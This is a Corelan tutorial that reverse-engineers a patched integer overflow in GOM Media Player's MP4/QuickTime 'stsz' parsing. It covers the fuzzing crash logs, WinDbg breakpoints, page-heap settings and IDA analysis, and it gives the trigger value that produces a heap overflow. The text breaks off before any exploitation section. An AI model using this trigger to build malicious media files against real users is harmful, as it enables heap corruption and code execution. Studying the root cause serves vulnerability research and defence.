Root Cause Analysis – Integer Overflows

Corelan Team (Jason Kratzer) July 2, 2013

This article has 38,309 views

Foreword

Over the past few years, Corelan Team has received many exploit related questions, including "I have found a bug and I don't seem to control EIP, what can I do ?"; "Can you write a tutorial on heap overflows" or "what are Integer overflows".

In this article, Corelan Team member Jason Kratzer (pyoor) tries to answer some of these questions in a very practical, hands-on way. He went to great lengths to illustrate the process of finding a bug, taking the crash information and reverse engineering the crash context to identifying the root cause of the bug, to finally discussing multiple ways to exploit the bug. Of course, most - if not all - of the techniques in this document were discovered many years ago, but I'm sure this is one of the first (public) articles that shows you how to use them in a real life scenario, with a real application. Although the techniques mostly apply to Windows XP, we believe it is required knowledge, necessary before looking at newer versions of the Windows Operating system and defeating modern mitigation techniques.

enjoy !

- corelanc0d3r

Introduction

In my previous article, we discussed the process used to evaluate a memory corruption bug that I had identified in a recently patched version of KMPlayer. With the crash information generated by this bug we were able to step through the crash, identify the root cause of our exception, and determine exploitability. In doing so, we were able to identify 3 individual methods that could potentially be used for exploitation. This article will serve as a continuation of the series with the intention of building upon some of the skills we discussed during the previous “Root Cause Analysis” article. I highly recommend that if you have not done so already, please review the contents of that article (located here) before proceeding.

For the purpose of this article, we’ll be analyzing an integer overflow that I had identified in the GOM Media Player software developed by GOM Labs. This bug affects GOM Media Player 2.1.43 and was reported to the GOM Labs development team on November 19, 2012. A patch was released to mitigate this issue on December 12, 2012.

As with our previous bug, I had identified this vulnerability by fuzzing the MP4/QT file formats using the Peach Framework (v2.3.9). In order to reproduce this issue, I have provided a bare bones fuzzing template (Peach PIT) which specifically targets the vulnerable portion of the MP4/QT file format. You can find a copy of that Peach PIT here. The vulnerable version of GOM player can be found here.

Analyzing the Crash Data

Let’s begin by taking a look at the file, LocalAgent_StackTrace.txt, which was generated by Peach at crash time. I’ve included the relevant portions below:

(cdc.5f8): Access violation - code c0000005 (first chance)
r
eax=00000028 ebx=0000004c ecx=0655bf60 edx=00004f44 esi=06557fb4 edi=06555fb8
eip=063b4989 esp=0012bdb4 ebp=06557f00 iopl=0         nv up ei pl nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00210206
GSFU!DllUnregisterServer+0x236a9:
063b4989 891481          mov     dword ptr [ecx+eax*4],edx ds:0023:0655c000=????????

kb
ChildEBP RetAddr  Args to Child              
WARNING: Stack unwind information not available. Following frames may be wrong.
0012bdc0 063b65eb 064dcda8 06555fb8 0652afb8 GSFU!DllUnregisterServer+0x236a9
0012bdd8 063b8605 064dcda8 06555fb8 0652afb8 GSFU!DllUnregisterServer+0x2530b
0012be00 063b8a85 064dcda8 0652afb8 0652afb8 GSFU!DllUnregisterServer+0x27325
0012be18 063b65eb 064dcda8 0652afb8 06510fb8 GSFU!DllUnregisterServer+0x277a5
0012be30 063b8605 064dcda8 0652afb8 06510fb8 GSFU!DllUnregisterServer+0x2530b
0012be58 063b8a85 064dcda8 06510fb8 06510fb8 GSFU!DllUnregisterServer+0x27325
0012be70 063b65eb 064dcda8 06510fb8 06500fb8 GSFU!DllUnregisterServer+0x277a5
<...truncated...>

INSTRUCTION_ADDRESS:0x00000000063b4989
INVOKING_STACK_FRAME:0
DESCRIPTION:User Mode Write AV
SHORT_DESCRIPTION:WriteAV
CLASSIFICATION:EXPLOITABLE
BUG_TITLE:Exploitable - User Mode Write AV starting at GSFU!DllUnregisterServer+0x00000000000236a9 (Hash=0x1f1d1443.0x00000000)
EXPLANATION:User mode write access violations that are not near NULL are exploitable.

(You can download the complete Peach crash data here)

As we can see here, we’ve triggered a write access violation by attempting to write the value of edx to the location pointed at by [ecx+eax*4]. This instruction fails of course because the location [ecx+eax*4] points to an inaccessible region of memory. (0655c000=????????)

Since we do not have symbols for this application, the stack trace does not provide us with any immediately evident clues as to the cause of our exception.

Furthermore, we can also see that !exploitable has made the assumption that this crash is exploitable due to the fact that the faulting instruction attempts to write data to an out of bounds location and that location is not near null. It makes this distinction because a location that is near null may be indicative of a null pointer dereference and these types of bugs are typically not exploitable (though not always). Let’s try and determine if !exploitable is in fact, correct in this assumption.

Identifying the Cause of Exception

Page heap

Before we begin, there’s something very important that we must discuss. Take a look at the bare bones Peach PIT I’ve provided; particularly the Agent configuration beginning at line 55.

<Agent name="LocalAgent">
  <Monitor class="debugger.WindowsDebugEngine">
    <Param name="CommandLine" value="C:\Program Files\GRETECH\GomPlayer\GOM.EXE &quot;C:\fuzzed.mov&quot;" />
    <Param name="StartOnCall" value="GOM.EXE" />
  </Monitor>
  <Monitor class="process.PageHeap">
    <Param name="Executable" value="GOM.EXE"/>
  </Monitor>
</Agent>

Using this configuration, I’ve defined the primary monitor as the “WindowsDebugEngine” which uses PyDbgEng, a wrapper for the WinDbg engine dbgeng.dll, in order to monitor the process. This is typical of most Peach fuzzer configurations under windows. However, what’s important to note here is the second monitor, “process.PageHeap”. This monitor enables full page heap verification by using the Microsoft Debugging tool, GFlags (Global Flags Editor). In short, GFlags is a utility that is packaged with the Windows SDK, and enables users to more easily troubleshoot potential memory corruption issues. There are a number of configuration options available with GFlags. For the purpose of this article, we’ll only be discussing 2: standard and full page heap verification.

When using page heap verification, a special page header prefixes each heap chunk. The image below displays the structure of a standard (allocated) heap chunk and the structure of an (allocated) heap chunk with page heap enabled.

This information can also be extracted by using the following display types variables:

# Displays the standard heap metadata. Replace 0xADDRESS with the heap chunk start address

dt _HEAP_ENTRY 0xADDRESS

# Displays the page heap metadata. Replace 0xADDRESS with the start stamp address.

dt _DPH_BLOCK_INFORMATION 0xADDRESS

One of the most important additions to the page heap header is the "user stack traces" (+ust) field. This field contains a pointer to the stack trace of our allocated chunk. This means that we’re now able to enumerate which functions eventually lead to the allocation or free of a heap chunk in question. This is incredibly useful when trying to track down the root cause of our exception.

Both standard and full heap verification prefix each chunk with this header. The primary difference between standard and full page heap verification is that under standard heap verification, fill patterns are placed at the end of each heap chunk (0xa0a0a0a0). If for instance a buffer overflow were to occur and data was written beyond the boundary of the heap chunk, the fill pattern located at the end of the chunk would be overwritten and therefore, corrupted. When our now corrupt block is accessed by the heap manager, the heap manager will detect that the fill pattern has been modified/corrupted and cause an access violation to occur.

With full page heap verification enabled, rather than appending a fill pattern, each heap chunk is placed at the end of a (small) page. This page is followed by another (small) page that has the PAGE_NOACCESS access level set. Therefore, as soon as we attempt to write past the end of the heap chunk, an access violation will be triggered directly (in comparison with having to wait for a call to the heap manager). Of course, the use of full page heap will drastically change the heap layout, because a heap allocation will trigger the creation of a new page. In fact, the application may even run out of heap memory space if your application is performing a lot of allocations.

For a full explanation of GFlags, please take a look at the MSDN documentation here.

Now the reason I’ve brought this up, is that in order to replicate the exact crash generated by Peach, we’ll need to enable GFlags for the GOM.exe process. GFlags is part of the Windows Debugging Tools package which is now included in the Windows SDK. The Windows 7 SDK, which is recommended for both Windows XP and 7 can be found here.

In order to enable full page heap verification for the GOM.exe process, we’ll need to execute the following command.

C:\Program Files\Debugging Tools for Windows (x86)>gflags /p /enable GOM.exe /full

Initial analysis

With that said, let’s begin by comparing our original seed file and mutated file using the 010 Binary Editor.

Please note that in the screenshot below, “Address A” and “Address B” correlate with OriginalSeed.mov and MutatedSeed.mov respectively.

Here we can see that our fuzzer applied 8 different mutations and removed 1 block element entirely (as identified by our change located at offset 0x12BE).

As documented in the previous article, you should begin by reverting each change, 1 element at a time, from their mutated values to those found in the original seed file. After each change, save the updated sample and open it up in GOM Media Player while monitoring the application using WinDbg.

windbg.exe "C:\Program Files\GRETECH\GomPlayer\GOM.EXE" "C:\Path-To\MutatedSeed.mov"

The purpose here is to identify the minimum number of mutated bytes required to trigger our exception. Rather than documenting each step of the process which we had already outlined in the previous article, we’ll simply jump forward to the end result. Your minimized sample file should now look like the following:

Here we can see that a single, 4 byte change located at file offset 0x131F was responsible for triggering our crash. In order to identify the purpose of these bytes, we must identify what atom or container they belong to.

Just prior to our mutated bytes, we can see the ASCII string “stsz”. This is known as a FourCC. The QuickTime and MPEG-4 file formats rely on these FourCC strings in order to identify various atoms or containers used within the file format. Knowing that, we can lookup the structure of the “stsz” atom in the QuickTime File Format Specification found here.

Size:  0x00000100 
Type:  0x7374737A (ASCII stsz) 
Version:  0x00 
Flags:  0x000000 
Sample Size: 0x00000000
Number of Entries: 0x8000000027
Sample Size Table(1):  0x000094B5
Sample Size Table(2):  0x000052D4

Looking at the layout of the “stsz” atom, we can see that the value for the “Number of Entries” element has been replaced with a significantly larger value (0x80000027 compared with the original value of 0x3B). Now that we’ve identified the minimum change required to trigger our exception, let’s take a look at the faulting block (GSFU!DllUnregisterServer+0x236a9) in IDA Pro.

Reversing the Faulty Function

Without any state information, such as register values or memory locations used during run time, we can only make minor assumptions based on the instructions contained within this block. However, armed with only this information, let’s see what we can come up with.

Let’s assume that eax and edx are set to 0x00000000 and that esi points to 0xAABBCCDD
A single byte is moved from the location pointed at by esi to edx resulting in edx == 0x000000AA
A single byte is moved from the location pointed at by [esi+1] to ecx
edx is shifted left by 8 bytes resulting in 0x0000AA00
ecx is added to @edx resulting in 0x0000AABB
A single byte is moved from the location pointed at by [esi+2] to ecx
edx is again shifted left by 8 bytes resulting in 0x00AABB00
ecx is again added to edx resulting in 0x00AABBCC
A single byte is moved from the location pointed at by [esi+3] to ecx
edx is again shifted left by 8 bytes resulting in 0xAABBCC00
And finally, ecx is added to edx resulting in 0xAABBCCDD

So what does this all mean? Well, our first 10 instructions appear to be an overly complex version of the following instruction:

movzx edx, dword ptr [esi]

However, upon closer inspection what we actually see is that due to the way bytes are stored in memory, this function is actually responsible for reversing the byte order of the input string. So our initial read value of 0x41424344 (ABCD) will be written as 0x44434241 (DCBA).

With that said, let’s reduce our block down to:

loc_3B04960:
cmp     ebx, 4
jl      short loc_3B0499D	; Jump outside of our block

movzx   edx, dword ptr [esi]	; Writes reverse byte order ([::-1])
mov     ecx, [edi+28h]
mov     ecx, [ecx+10h]
mov     [ecx+eax*4], edx 	; Exception occurs here.
				; Write @edx to [ecx+eax*4]
mov     edx, [edi+28h]
mov     ecx, [edx+0Ch]
add     esi, 4
sub     ebx, 4
inc     eax
cmp     eax, ecx
jb      short loc_3B04960

Now before we actually observe our block in the debugger, there are still a few more characteristics we can enumerate.

The value pointed to by esi is moved to edx
edx is then written to [ecx+eax*4]
The value of esi is increased by 4
The value of ebx is decreased by 4
eax is incremented by 1
The value of eax is compared against ecx. If eax is equal to ecx, exit the block. Otherwise, jump to our first instruction.
Once at the beginning of our block, ebx is then compared against 0x4. If ebx is less than 4, exit the block. Otherwise, perform our loop again.

To summarize, our first instruction attempts to determine if ebx is less than or equal to 4. If it is not, we begin our loop by moving a 32 bit value at memory location “A” and write it to memory location “B”. Then we check to make sure eax is not equal to ecx. If it isn’t, then we return to the beginning of our loop. This process will continue, performing a block move of our data until one of our 2 conditions are met.

With a rough understanding of the instruction set, let’s observe its behavior in our debugger. We’ll set the following breakpoints which will halt execution if either of our conditions cause our block iteration to exit and inform us of what data is being written and to where.

r @$t0 = 1
bp GSFU!DllUnregisterServer+0x23680 ".printf \"Block iteration #%p\\n\", @$t0; r @$t0 = @$t0 + 1; .if (@ebx <= 0x4) {.printf \"1st condition is true.  Exiting block iteration\\n\"; } .else {.printf \"1st condition is false (@ebx == 0x%p).  Performing iteration\\n\", @ebx; gc}"
bp GSFU!DllUnregisterServer+0x236a9 ".printf \"The value, 0x%p, is taken from 0x%p and written to 0x%p\\n\", @edx, @esi, (@ecx+@eax*4); gc"
bp GSFU!DllUnregisterServer+0x236b9 ".if (@eax == @ecx) {.printf \"2nd is false.  Exiting block iteration.\\n\\n\"; } .else {.printf \"2nd condition is true.  ((@eax == 0x%p) <= (@ecx == 0x%p)).  Performing iteration\\n\\n\", @eax, @ecx; gc}"

With our breakpoints set, you should see something similar to the following:

Block iteration #00000001
1st condition is false (@ebx == 0x000000ec).  Performing iteration
The value, 0x000094b5, is taken from 0x07009f14 and written to 0x0700df60
2nd condition is true.  ((@eax == 0x00000001) <= (@ecx == 0x80000027)).  Performing iteration

Block iteration #00000002
1st condition is false (@ebx == 0x000000e8).  Performing iteration
The value, 0x000052d4, is taken from 0x07009f18 and written to 0x0700df64
2nd condition is true.  ((@eax == 0x00000002) <= (@ecx == 0x80000027)).  Performing iteration

...truncated...

Block iteration #00000028
1st condition is false (@ebx == 0x00000050).  Performing iteration
The value, 0x00004fac, is taken from 0x07009fb0 and written to 0x0700dffc
2nd condition is true.  ((@eax == 0x00000028) <= (@ecx == 0x80000027)).  Performing iteration

Block iteration #00000029
1st condition is false (@ebx == 0x0000004c).  Performing iteration
The value, 0x00004f44, is taken from 0x07009fb4 and written to 0x0700e000
(1974.1908): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000028 ebx=0000004c ecx=0700df60 edx=00004f44 esi=07009fb4 edi=07007fb8
eip=06e64989 esp=0012bdb4 ebp=07009f00 iopl=0         nv up ei pl nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00210206
GSFU!DllUnregisterServer+0x236a9:
06e64989 891481          mov     dword ptr [ecx+eax*4],edx ds:0023:0700e000=????????

Here we can see that neither of our conditions caused our block iteration to exit. Our instruction block performed 0x29 writes until a memory boundary was reached (likely caused by our full page heap verification) which triggers an access violation. Using the ‘db’ command, we let’s take a look at the data we've written.

0:000> db 0x0700df60
0700df60  b5 94 00 00 d4 52 00 00-a8 52 00 00 2c 52 00 00  .....R...R..,R..
0700df70  7c 52 00 00 80 52 00 00-a4 52 00 00 28 53 00 00  |R...R...R..(S..
0700df80  18 53 00 00 94 52 00 00-20 53 00 00 ac 52 00 00  .S...R.. S...R..
0700df90  28 53 00 00 e0 51 00 00-d0 52 00 00 88 52 00 00  (S...Q...R...R..
0700dfa0  e0 52 00 00 94 52 00 00-18 53 00 00 14 52 00 00  .R...R...S...R..
0700dfb0  14 52 00 00 5c 52 00 00-34 52 00 00 08 52 00 00  .R..\R..4R...R..
0700dfc0  d4 51 00 00 84 51 00 00-d8 51 00 00 d8 50 00 00  .Q...Q...Q...P..
0700dfd0  3c 51 00 00 04 52 00 00-a4 51 00 00 bc 50 00 00  <q...r...q...p..

Now let’s break down the information returned by our breakpoints:

First, taking a look at our write instructions we can see that the data being written appears to be the contents of our “Sample Size Table”. Our vulnerable block is responsible for reading 32 bits during each iteration from a region of memory beginning at 0x07009F14 and writing it to a region beginning at 0x0700DF60 (these addresses may be different for you and will likely change after each execution). This is good a good sign as it means that we can control what data is being written.
Furthermore, we can see that during our second condition, eax is being compared against the same value being provided as the “Number of Entries” element within our “stsz” atom. This means that we can control at least 1 of the 2 conditions which will determine how many times our write instruction occurs. This is good. As with our previous example (KMPlayer), we demonstrated that if we can write beyond the intended boundary of our function, we may be able to overwrite sensitive data.
As for our first condition, it’s not yet apparent where the value stored in ebx is derived. More on this in a bit.

At this point, things are looking pretty good. So far we’ve determined that we can control the data we write and at least one of our conditions. However, we still haven’t figured out yet why we’re writing beyond our boundary and into the guard page. In order to determine this, we’ll need to enumerate some information regarding the region where our data is being written, such as the size and type (whether it be stack, heap, or virtually allocated memory). To do so, we can use corelan0cd3r’s mona extension for WinDbg. Before we do however, we’ll need to modify Gflags to only enable standard page heap verification. The reason for this is that when using full page heap verification, Gflags will modify our memory layout in such a way that will not accurately reflect our memory state when run without GFlags. To enable standard page heap verification, we’ll execute the following command:

gflags.exe /p /enable gom.exe

Next, let's go ahead and start our process under WinDbg. This time, we'll only apply 1 breakpoint in order to halt execution upon execution of our first write instruction.

0:000> bp GSFU!DllUnregisterServer+0x236a9 ".printf \"The value, 0x%p, is taken from 0x%p and written to 0x%p\\n\", @edx, @esi, (@ecx+@eax*4)"
Bp expression 'GSFU!DllUnregisterServer+0x236a9' could not be resolved, adding deferred bp
0:000> g

The value, 0x000094b5, is taken from 0x06209c4c and written to 0x06209dc0
eax=00000000 ebx=000000ec ecx=06209dc0 edx=000094b5 esi=06209c4c edi=06209bb8
eip=06034989 esp=0012bdb4 ebp=06209c38 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00200202
GSFU!DllUnregisterServer+0x236a9:
06034989 891481          mov     dword ptr [ecx+eax*4],edx ds:0023:06209dc0=00000000
0:000> !py mona info -a 0x06209dc0
Hold on...
[+] Generating module info table, hang on...
    - Processing modules
    - Done. Let's rock 'n roll.
[+] NtGlobalFlag: 0x02000000
    0x02000000 : +hpa - Enable Page Heap

[+] Information about address 0x06209dc0
     {PAGE_READWRITE}
    Address is part of page 0x06200000 - 0x0620a000
    This address resides in the heap

Address 0x06209dc0 found in 
    _HEAP @ 06200000, Segment @ 06200680
                      (         bytes        )                   (bytes)
      HEAP_ENTRY      Size  PrevSize    Unused Flags    UserPtr  UserSize Remaining - state
        06209d98  000000d8  00000050  00000014  [03]   06209dc0  000000a4  0000000c   Extra present,Busy  (hex)
                  00000216  00000080  00000020                   00000164  00000012   Extra present,Busy  (dec)

      Chunk header size: 0x8 (8)
      Extra header due to GFlags: 0x20 (32) bytes
      DPH_BLOCK_INFORMATION Header size: 0x20 (32)
         StartStamp    : 0xabcdaaaa
         Heap          : 0x86101000
         RequestedSize : 0x0000009c
         ActualSize    : 0x000000c4
         TraceIndex    : 0x0000193e
         StackTrace    : 0x04e32364
         EndStamp      : 0xdcbaaaaa
      Size initial allocation request: 0xa4 (164)
      Total space for data: 0xb0 (176)
      Delta between initial size and total space for data: 0xc (12)
      Data : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ...

[+] Disassembly:
    Instruction at 06209dc0 : ADD BYTE PTR [EAX],AL

Output of !address 0x06209dc0:

Usage:                  <unclassified>
Allocation Base:        06200000
Base Address:           06200000
End Address:            0620a000
Region Size:            0000a000
Type:                   00020000.MEM_PRIVATE
State:                  00001000.MEM_COMMIT
Protect:                00000004.PAGE_READWRITE

Good. So here we can see that we’re writing to an allocated heap chunk. The requested size of our block is 0x9C. Based on our access violation, we can already determine that the current state of our mutated file will attempt to write more than 0x9C bytes of data. After 0x9C bytes, our boundary is reached and an access violation is triggered. Considering the structure in which we’re writing our data, it appears as if we’ve identified a very simple example of a heap overflow. If we are able to control the length of the data being written and another heap chunk sits in a location following our written data, we may be able to write beyond the bounds of our chunk and corrupt the metadata (chunk header) of the following chunk, or application data stored in that adjacent chunk (that is of course with GFlags disabled). More on this later.

However, before we attempt to do so, we still have not determined the actual cause of our exception. Why is it that we are allocating a region that is only 0x9C bytes, yet attempting to write significantly more? Our next step in the process will be to determine where our allocated size of 0x9C comes from. Is this some value specified in the file?

There are in in fact several methods we could use to determine this. We could set a breakpoint on all heap allocations of size 0x9C. Once we’ve identified the appropriate allocation, we can then look into the calling function in order to determine where the size is derived.

Fortunately for us, with GFlags enabled, that is unnecessary. As I mentioned earlier, when page heap verification is enabled, a field within the page heap header contains a pointer to the stack trace of our allocated block. A pointer to this stack trace is listed in !mona’s output under DPH_BLOCK_INFORMATION*** table (highlighted above). This allows us to see which functions were called just prior to our allocation.

This information can also be obtained without !mona by using the !heap command while supplying an address within the heap chunk:

!heap –p –a 0x06209dc0

You can also retrieve this information using the ‘dt’ command and the address of the chunk’s “StartStamp”.

dt _DPH_BLOCK_INFORMATION 0x06209da0.

With that said, let’s use the ‘dds’ command to display the stack trace of the allocated chunk.

0:000> dds 0x04e32364

04e32364  abcdaaaa
04e32368  00000001
04e3236c  00000004
04e32370  00000001
04e32374  0000009c
04e32378  06101000
04e3237c  04fbeef8
04e32380  04e32384
04e32384  7c94b244 ntdll!RtlAllocateHeapSlowly+0x44
04e32388  7c919c0c ntdll!RtlAllocateHeap+0xe64
04e3238c  0609c2af GSFU!DllGetClassObject+0x29f8f
04e32390  06034941 GSFU!DllUnregisterServer+0x23661

Here we can see two GOM functions (GSFU!DLLUnregisterServer and GSFU!DLLGetClassObject) are called prior to the allocation. First, let’s take a quick glance at the function just prior to our call to ntdll!RtlAllocateHeap using IDA Pro.

So as we would expect, here we can see a call to HeapAlloc. The value being provided as dwBytes would be 0x9C (our requested size).

It’s important to note here that IDA Pro, unlike WinDbg, has the ability to enumerate functions such as this. When it identifies a call to a known function, it will automatically apply comments in order to identify known variables supplied to that function. In the case of HeapAlloc (ntdll!RtlAllocateHeap), it will accept 3 arguments; dwBytes (size of the allocation), dwFlags, and hHeap (a pointer to the owning heap). More information on this function can be found at the MSDN page here.

Now in order to identify where the value of dwBytes is introduced, let’s go ahead and take a quick look at the previous function (GSFU!DllUnregisterServer+0x23661) in our stack trace.

Interesting. Here we can see that a call to the Calloc function is made, which in turn calls HeapAlloc. Before we continue, we need to have a short discussion about Calloc.

Calloc is a function used to allocate a contiguous block of memory when parsing an array. It accepts two arguments:

size_t num ; Number of Objects
size_t size ; Size of Objects

It will allocate a region of memory using a size derived by multiplying both arguments (Number of Objects * Size of Objects). Then, by calling memset it will zero initialize the array (not really important for the purpose of this article). What is important to note however, is that rather than using the CRT version of Calloc (msvcrt!calloc), an internal implementation is used. We can see this by following the call (the code is included in the GSFU module rather than making an external call to msvcrt)***. The importance of this will become clear very soon.

You can easily follow any call in IDA Pro by simply clicking on the called function. In this case, clicking on “_calloc” will bring us to our inlined function. We can determine that the function has been inlined as GSFU.ax is our only loaded module. A jump to the msvcrt!calloc function would be displayed by an “extrn”, or external, data reference (DREF).

Now, with a quick look at our two calling functions, let’s go ahead and set a one time breakpoint on the first value being supplied to Calloc so that once it is hit, another breakpoint is applied to ntdll!RtlAllocateHeap. Then, we’ll trace until ntdll!RtlAllocateHeap is hit.

Let’s go ahead and apply the following breakpoint, and then tell the process to continue running (g)

0:000> bp GSFU!DllUnregisterServer+0x23653 /1 "bp ntdll!RtlAllocateHeap; ta"
Bp expression 'GSFU!DllUnregisterServer+0x23653 /1' could not be resolved, adding deferred bp
0:000> g

eax=050d9d70 ebx=000000f8 ecx=050d9d70 edx=80000027 esi=050d9c48 edi=050d9bb8
eip=06034934 esp=0012bdb0 ebp=050d9c38 iopl=0         nv up ei ng nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00200286
GSFU!DllUnregisterServer+0x23653
06034933 52             push    edx ; Number of Elements
eax=050d9d70 ebx=000000f8 ecx=050d9d70 edx=80000027 esi=050d9c48 edi=050d9bb8
eip=06034934 esp=0012bdb0 ebp=050d9c38 iopl=0         nv up ei ng nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00200286
GSFU!DllUnregisterServer+0x23654:
06034934 6a04            push    4 ; Size of Elements
eax=050d9d70 ebx=000000f8 ecx=050d9d70 edx=80000027 esi=050d9c48 edi=050d9bb8
eip=06034936 esp=0012bdac ebp=050d9c38 iopl=0         nv up ei ng nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00200286
GSFU!DllUnregisterServer+0x23656:
06034936 83c604          add     esi,4
eax=050d9d70 ebx=000000f8 ecx=050d9d70 edx=80000027 esi=050d9c4c edi=050d9bb8
eip=06034939 esp=0012bdac ebp=050d9c38 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00200202
GSFU!DllUnregisterServer+0x23659:
06034939 83eb0c          sub     ebx,0Ch
eax=050d9d70 ebx=000000ec ecx=050d9d70 edx=80000027 esi=050d9c4c edi=050d9bb8
eip=0603493c esp=0012bdac ebp=050d9c38 iopl=0         nv up ei pl nz ac po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00200212
GSFU!DllUnregisterServer+0x2365c:
0603493c e8e6780600      call    GSFU!DllGetClassObject+0x29f07 (0609c227) ; Calloc

...truncated...

eax=0012bd94 ebx=000000ec ecx=050d9d70 edx=80000027 esi=00000004 edi=050d9bb8
eip=05d5c236 esp=0012bd78 ebp=0012bda4 iopl=0         nv up ei pl nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00200206
GSFU!DllGetClassObject+0x29f16:
05d5c236 0faf750c        imul    esi,dword ptr [ebp+0Ch] ss:0023:0012bdb0=80000027
eax=0012bd94 ebx=000000ec ecx=050d9d70 edx=80000027 esi=0000009c edi=050d9bb8
eip=05d5c23a esp=0012bd78 ebp=0012bda4 iopl=0         ov up ei pl nz na pe cy
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00200a07
GSFU!DllGetClassObject+0x29f1a:
05d5c23a 8975e0          mov     dword ptr [ebp-20h],esi ss:0023:0012bd84=0012d690

...truncated...

eax=0012bd94 ebx=000000ec ecx=050d9d70 edx=80000027 esi=0000009c edi=00000000
eip=05d5c2a0 esp=0012bd78 ebp=0012bda4 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00200246
GSFU!DllGetClassObject+0x29f80:
05d5c2a0 56              push    esi ; Allocation Size
eax=0012bd94 ebx=000000ec ecx=050d9d70 edx=80000027 esi=0000009c edi=00000000
eip=05d5c2a1 esp=0012bd74 ebp=0012bda4 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00200246
GSFU!DllGetClassObject+0x29f81:
05d5c2a1 6a08            push    8 ; Flags
eax=0012bd94 ebx=000000ec ecx=050d9d70 edx=80000027 esi=0000009c edi=00000000
eip=05d5c2a3 esp=0012bd70 ebp=0012bda4 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00200246
GSFU!DllGetClassObject+0x29f83:
05d5c2a3 ff35a0cada05    push    dword ptr [GSFU!DllGetClassObject+0x7a780 (05dacaa0)] ds:0023:05dacaa0=05dc0000 ; HeapHandle
eax=0012bd94 ebx=000000ec ecx=050d9d70 edx=80000027 esi=0000009c edi=00000000
eip=05d5c2a9 esp=0012bd6c ebp=0012bda4 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00200246
GSFU!DllGetClassObject+0x29f89:
05d5c2a9 ff15ece0d605    call    dword ptr [GSFU!DllGetClassObject+0x3bdcc (05d6e0ec)] ds:0023:05d6e0ec={ntdll!RtlAllocateHeap (7c9100c4)}
Breakpoint 1 hit
eax=0012bd94 ebx=000000ec ecx=050d9d70 edx=80000027 esi=0000009c edi=00000000
eip=7c9100c4 esp=0012bd68 ebp=0012bda4 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00200246
ntdll!RtlAllocateHeap:
7c9100c4 6804020000      push    204h

When analyzing operations like this, I typically find it best to start from the bottom up. Since we already know that our requested allocation size is 0x9C, we can begin at the point where the value 0x9C is provided as the dwBytes argument for ntdll!RtlAllocateHeap (GSFU!DllGetClassObject+0x29f80).

The next thing we need to do is look for the instruction, prior to our push instruction, that either introduces the value 0x9C to esi or modifies it. Looking back a few lines, we see this instruction:

eax=0012bd94 ebx=000000ec ecx=050d9d70 edx=80000027 esi=00000004 edi=050d9bb8
eip=05d5c236 esp=0012bd78 ebp=0012bda4 iopl=0         nv up ei pl nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00200206
GSFU!DllGetClassObject+0x29f16:
05d5c236 0faf750c        imul    esi,dword ptr [ebp+0Ch] ss:0023:0012bdb0=80000027

Interesting. It appears that we’re performing signed multiplication of the value contained in esi (0x4) and our “Number of Entries” element within the “stsz” atom (as pointed to by our stack entry located at 0x0012bdb0). This makes sense since Calloc, as we had previously discussed, will perform an allocation of data with a size of (Number of Elements * Size of Elements). However, there seems to be a problem with our math. When multiplying 0x80000027 * 0x4, our result should be 0x20000009C rather than 0x0000009C. The reason for this is that we’re attempting to store a value larger than what our 32 bit register can hold. When doing so, an integer overflow occurs and our result is “wrapped,” causing only the 32 least significant bits to be stored in our register.

With this, we can control the size of our allocations by manipulating the value contained within our “Number of Entries” element. By allocating a chunk smaller than the data we intend to write, we can trigger a heap overflow.

However, the root cause of our issue is not exactly as clear as it may seem. When we looked at our function in IDA Pro earlier, we determined that rather than using the CRT version of calloc (msvcrt!calloc), GOM used a wrapped version instead. Had the actual Calloc function been used, this vulnerability would not exist. To explain this, let’s take a look at the code snippet below:

#include <stdio.h>
#include <malloc.h>

int main( void )
{

    int size = 0x4;             // Size of Element
    int num = 0x80000027;	// Number of Elements
    int *buffer;
    printf( "Attempting to allocate a buffer with size: 0x20000009C" );
    buffer = (int *)calloc( size, num ); // Size of Element * Number of Elements
    if( buffer != NULL )
      printf( "Allocated buffer with size (0x%X)\n",  _msize(buffer) );
    else
      printf( "Failed to allocate buffer.\n" );
    free( buffer );
}

The example above demonstrates a valid (albeit it, not the best) use of the Calloc. Here we’re trying to allocate an array with a size of 0x200000009C (0x4 * 0x80000027). Let’s see what would happen if we were to compile and run this code:

Attempting to allocate a buffer with size: 0x200000009C
Failed to allocate buffer.

Interesting. Calloc will fail to allocate a buffer due to checks intended in detect wrapped values. Under Windows XP SP3, this functionality can be seen in the following 2 instructions.

eax=ffffffe0 ebx=00000000 ecx=00000004 edx=00000000 esi=016ef79c edi=016ef6ee
eip=77c2c0dd esp=0022ff1c ebp=0022ff48 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
msvcrt!calloc+0x1a:
77c2c0dd f7f1            div     eax,ecx
eax=3ffffff8 ebx=00000000 ecx=00000004 edx=00000000 esi=016ef79c edi=016ef6ee
eip=77c2c0df esp=0022ff1c ebp=0022ff48 iopl=0         nv up ei pl zr na pe nc
